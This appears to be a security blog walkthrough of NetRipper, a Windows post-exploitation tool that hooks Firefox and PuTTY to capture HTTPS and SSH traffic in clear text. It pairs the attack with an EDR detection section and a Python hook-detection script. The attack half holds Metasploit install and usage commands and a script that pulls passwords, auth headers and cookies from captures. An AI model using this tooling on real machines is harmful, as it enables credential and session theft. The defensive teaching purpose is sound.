NetRipper is a post-exploitation tool for Windows that uses API hooking to intercept network and encryption-related functions from a low-privileged user context. Because the hooks sit on the application's own send/receive and crypto routines, it captures plain-text traffic as well as encrypted traffic before it is encrypted and after it is decrypted.

In practice this lets an attacker read the target's HTTPS and SSH traffic in clear-text, and harvest information such as usernames and passwords as soon as the user authenticates to a web application (over HTTPS) or to a network device (over SSH).

This post walks through the attack with NetRipper (assuming the attacker already has a Meterpreter shell) and then shows how an EDR tool such as RSA NetWitness Endpoint can detect it.

We are using:
– Kali Linux as the Attacker’s machine
– Windows 7 with McAfee Antivirus as the victim (the same technique also works on Windows 10)

Installation of NetRipper for Metasploit on Kali

Run the following commands on the Kali box to install NetRipper and make it available within Metasploit. The relative paths assume you are in the directory of the NetRipper source that holds netripper.rb (the Metasploit post module) and netripper.cpp (the helper the module runs on Kali), with the pre-built Windows hooking DLL in the sibling Release directory.

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
g++ -Wall netripper.cpp -o netripper
cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
cd ../Release
cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

Launch the Attack

We assume the attacker already has a Meterpreter shell.

[Screenshot: Meterpreter shell]

The attacker connects to the session with "sessions -i 1" and lists the running processes with "ps".

[Screenshot: ps output]

From the list he can see that firefox.exe and putty.exe are running.

The attacker now uses NetRipper to capture Firefox's network traffic in clear-text, even though it is sent over HTTPS.
He loads the module with: use post/windows/gather/netripper
He lists its options with: show options

[Screenshot: use post/windows/gather/netripper and show options]

The attacker needs to:
– set the session to use (session 1 from the list of available sessions): set SESSION 1
– set the names (or PIDs) of the processes to hook: set PROCESSNAMES firefox.exe,putty.exe

He then launches the module with: exploit (for a post module, run does the same)

[Screenshot: exploit]

Once the hooks are in place, NetRipper records the clear-text traffic of those processes on the victim's machine, by default under the current user's TEMP folder (changeable with the DATAPATH option), in files named after the process and the hooked function (e.g. firefox.exe_PR_Write.txt).

[Screenshot: listing of the capture folder]

The victim now authenticates to a web application over HTTPS. In this example we use Gmail, but it could be any site.

[Screenshot: Gmail login page]

Now the attacker reads the firefox.exe_PR_Write.txt file. PR_Write is the NSPR function Firefox calls to write a buffer to a socket, and NSS encrypts that buffer further down the stack, so the hook sees the HTTP request before TLS is applied: even though the victim used HTTPS, the attacker sees both the username (someone@gmail.com) and the password (password123) in clear-text.

[Screenshot: captured output]

The same works for Chrome, PuTTY, SecureCRT, WinSCP, Lync, Outlook and others, and it is not limited to login information: anything the process sends or receives through the hooked functions is captured.
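
As an added example of how an attacker triages such a capture (this is illustrative code, not part of NetRipper or of the original post): the script assumes the capture file holds the raw buffers handed to PR_Write back to back, i.e. unencrypted HTTP requests, splits them, and pulls out Basic-auth headers, cookies and credential-looking form fields. The sample capture, hostnames and credentials are constructed.

```python
"""Triage of a NetRipper-style capture: plaintext buffers taken before TLS.

Added example, not code from NetRipper or the original post. Assumption:
the capture file holds the raw buffers handed to PR_Write, back to back,
so it reads as a series of unencrypted HTTP requests. SAMPLE_CAPTURE is
constructed; no real site or account is involved.
"""
import base64
import binascii
import re
from urllib.parse import parse_qsl

# Constructed stand-in for firefox.exe_PR_Write.txt: a login POST followed
# by an unrelated GET. Content-Length 46 matches the body exactly.
SAMPLE_CAPTURE = (
    b"POST /signin/challenge HTTP/1.1\r\n"
    b"Host: accounts.example.com\r\n"
    b"Cookie: SID=abc123; HSID=def456\r\n"
    b"Authorization: Basic dXNlcjpwYXNz\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 46\r\n"
    b"\r\n"
    b"Email=someone%40example.com&Passwd=password123"
    b"GET /mail/ HTTP/1.1\r\n"
    b"Host: mail.example.com\r\n"
    b"\r\n"
)

# A new request starts wherever a request line appears; the lookahead keeps
# the request line inside the chunk that follows the split point.
REQUEST_START = re.compile(
    rb"(?=(?:GET|POST|PUT|PATCH|DELETE|HEAD|OPTIONS) \S+ HTTP/1\.[01]\r\n)")
# Form field names that usually carry credentials or session material.
CRED_FIELD = re.compile(r"user|email|login|pass|pwd|secret|token", re.I)


def split_requests(capture: bytes) -> list:
    """Cut the concatenated buffers into one chunk per HTTP request."""
    return [chunk for chunk in REQUEST_START.split(capture) if chunk]


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.x request parser: request line, headers, bounded body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, _, rest = lines[0].partition(" ")
    path = rest.split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0") or 0)
    return {"method": method, "path": path, "host": headers.get("host", ""),
            "headers": headers, "body": body[:length].decode("latin-1")}


def extract_credentials(req: dict) -> list:
    """Return (label, value) pairs worth an attacker's attention."""
    found = []
    auth = req["headers"].get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            user, _, pw = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
            found += [("basic-user", user), ("basic-password", pw)]
        except (binascii.Error, ValueError):
            found.append(("basic-raw", auth[6:]))   # undecodable, keep as-is
    cookie = req["headers"].get("cookie")
    if cookie:
        found.append(("cookie", cookie))            # session tokens ride here
    if req["headers"].get("content-type", "").startswith("application/x-www-form-urlencoded"):
        for name, value in parse_qsl(req["body"], keep_blank_values=True):
            if CRED_FIELD.search(name):
                found.append((name, value))
    return found


def triage(capture: bytes) -> list:
    """One record per request that carried something credential-like."""
    results = []
    for raw in split_requests(capture):
        req = parse_request(raw)
        creds = extract_credentials(req)
        if creds:
            results.append({"host": req["host"], "path": req["path"],
                            "credentials": creds})
    return results


if __name__ == "__main__":
    # On a real capture: triage(open("firefox.exe_PR_Write.txt", "rb").read())
    for hit in triage(SAMPLE_CAPTURE):
        print(hit["host"], hit["path"])
        for label, value in hit["credentials"]:
            print(f"  {label}: {value}")
```

The split on request lines is what makes the triage usable on a long session: the hook fires once per PR_Write call, so the file is a stream of requests with no separators, and the form-field filter is deliberately loose because every site names its login fields differently.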

Detection Using an EDR Solution

Now that we have seen how easily an attacker can sniff encrypted traffic via process hooking without the victim's antivirus reacting, we will see how to detect it with an EDR solution such as RSA NetWitness Endpoint.

In the screenshot below, RSA NWE shows:
– the hooked process (firefox.exe)
– the names of the hooked modules
– the hooked symbols
– an elevated IIOC score
– the list of IIOCs that have been triggered

Hooks on a browser's network functions are not unique to NetRipper (some security and accessibility products install them too), so the combination is what matters: which module the hook jumps into, whether that module is signed and known, and how many IIOCs fire together.

[Screenshot: RSA NetWitness Endpoint IIOC view]

In addition, analyzing the hooking module statically shows references to NetRipper and to the files and folders the tool uses.

[Screenshot: RSA NetWitness Endpoint module analysis]
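
To make the EDR's findings concrete, here is an added, illustrative example (not RSA NetWitness code) of the two checks behind the screenshots above: comparing an export's prologue in memory with the on-disk copy, decoding the trampoline to find which module the jump lands in, and scanning that module for indicator strings. Module names, addresses, prologue bytes and the indicator strings are constructed assumptions standing in for what an agent reads from disk and memory.

```python
"""Hook and indicator checks of the kind an EDR runs on a hooked process.

Added, illustrative example; not RSA NetWitness code. All module names,
addresses, prologue bytes and indicator strings below are constructed
assumptions standing in for what an agent reads from disk and memory.
"""
import re
import struct
from dataclasses import dataclass


@dataclass
class Module:
    name: str
    base: int
    size: int
    is_64bit: bool
    image: bytes        # module bytes as mapped in the process


@dataclass
class Export:
    name: str
    rva: int            # function offset within its module
    disk_bytes: bytes   # first bytes of the function in the file on disk
    mem_bytes: bytes    # first bytes of the function in the live process


def decode_jump_target(code: bytes, address: int, is_64bit: bool):
    """Decode the trampoline a hooking library writes over a prologue.

    Handles: E9 rel32 (jmp), 68 imm32 C3 (push/ret), 48 B8 imm64 FF E0
    (mov rax; jmp rax) and FF 25 00000000 + abs64 (jmp [rip+0]).
    Returns the destination address, or None if no known pattern matches.
    """
    mask = (1 << 64) - 1 if is_64bit else (1 << 32) - 1
    if len(code) >= 5 and code[0] == 0xE9:
        return (address + 5 + struct.unpack_from("<i", code, 1)[0]) & mask
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:
        return struct.unpack_from("<I", code, 1)[0]
    if is_64bit and len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return struct.unpack_from("<Q", code, 2)[0]
    if is_64bit and len(code) >= 14 and code[:6] == b"\xFF\x25\x00\x00\x00\x00":
        return struct.unpack_from("<Q", code, 6)[0]
    return None


ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")
# Assumed indicators: the tool's name and its capture-file naming/location.
INDICATORS = re.compile(r"NetRipper|_PR_Write\.txt|\\Temp\\", re.I)


def suspicious_strings(image: bytes) -> list:
    """`strings`-style extraction (ASCII and UTF-16LE) filtered by indicators."""
    found = [m.group().decode("ascii") for m in ASCII_RUN.finditer(image)]
    found += [m.group().decode("utf-16-le") for m in WIDE_RUN.finditer(image)]
    return [s for s in found if INDICATORS.search(s)]


def analyse(victim: Module, exports: list, loaded: list) -> list:
    """Flag exports whose in-memory prologue differs from disk, decode where
    the patch jumps to, attribute that address to a loaded module and scan
    that module for indicator strings."""
    findings = []
    for exp in exports:
        if exp.mem_bytes == exp.disk_bytes:
            continue                      # prologue intact, nothing patched
        address = victim.base + exp.rva
        target = decode_jump_target(exp.mem_bytes, address, victim.is_64bit)
        owner = next((m for m in loaded
                      if target is not None and m.base <= target < m.base + m.size), None)
        findings.append({
            "symbol": f"{victim.name}!{exp.name}",
            "address": address,
            "target": target,
            "target_module": owner.name if owner else None,
            "cross_module": owner is not victim,   # a legit hot-patch stays in-module
            "indicators": suspicious_strings(owner.image) if owner else [],
        })
    return findings


# Constructed sample: 32-bit Firefox, NSPR exports PR_Write/PR_Read, with
# PR_Write's hot-patchable prologue overwritten by a jmp into an injected DLL.
HOTPATCH_PROLOGUE = b"\x8B\xFF\x55\x8B\xEC"      # mov edi,edi; push ebp; mov ebp,esp
NSS3 = Module("nss3.dll", base=0x6A000000, size=0x200000, is_64bit=False, image=b"")
INJECTED = Module("DLL.dll", base=0x10000000, size=0x20000, is_64bit=False, image=(
    b"MZ\x90\x00" + b"\x00" * 60 + b"NetRipper.dll\x00" + b"\x00" * 16
    + "C:\\Users\\victim\\AppData\\Local\\Temp\\firefox.exe_PR_Write.txt".encode("utf-16-le")
    + b"\x00\x00"))
HOOK_TARGET = 0x10001000
PR_WRITE_ADDRESS = NSS3.base + 0x1234
EXPORTS = [
    Export("PR_Write", 0x1234, HOTPATCH_PROLOGUE,
           b"\xE9" + struct.pack("<i", HOOK_TARGET - (PR_WRITE_ADDRESS + 5))),
    Export("PR_Read", 0x1300, HOTPATCH_PROLOGUE, HOTPATCH_PROLOGUE),
]

if __name__ == "__main__":
    for f in analyse(NSS3, EXPORTS, [NSS3, INJECTED]):
        target = "unknown" if f["target"] is None else hex(f["target"])
        print(f"{f['symbol']} @ {hex(f['address'])} -> {target} in "
              f"{f['target_module']} (cross-module: {f['cross_module']})")
        for s in f["indicators"]:
            print("  indicator:", s)
```

Two caveats a real agent has to handle that the sample glosses over: a module's in-memory bytes legitimately differ from disk wherever relocations or import thunks were applied, so the comparison should cover only the function's first instructions rather than whole sections; and a jump into another module is suspicious, not conclusive, which is why the indicator scan and the reputation of the target module are checked alongside the hook itself.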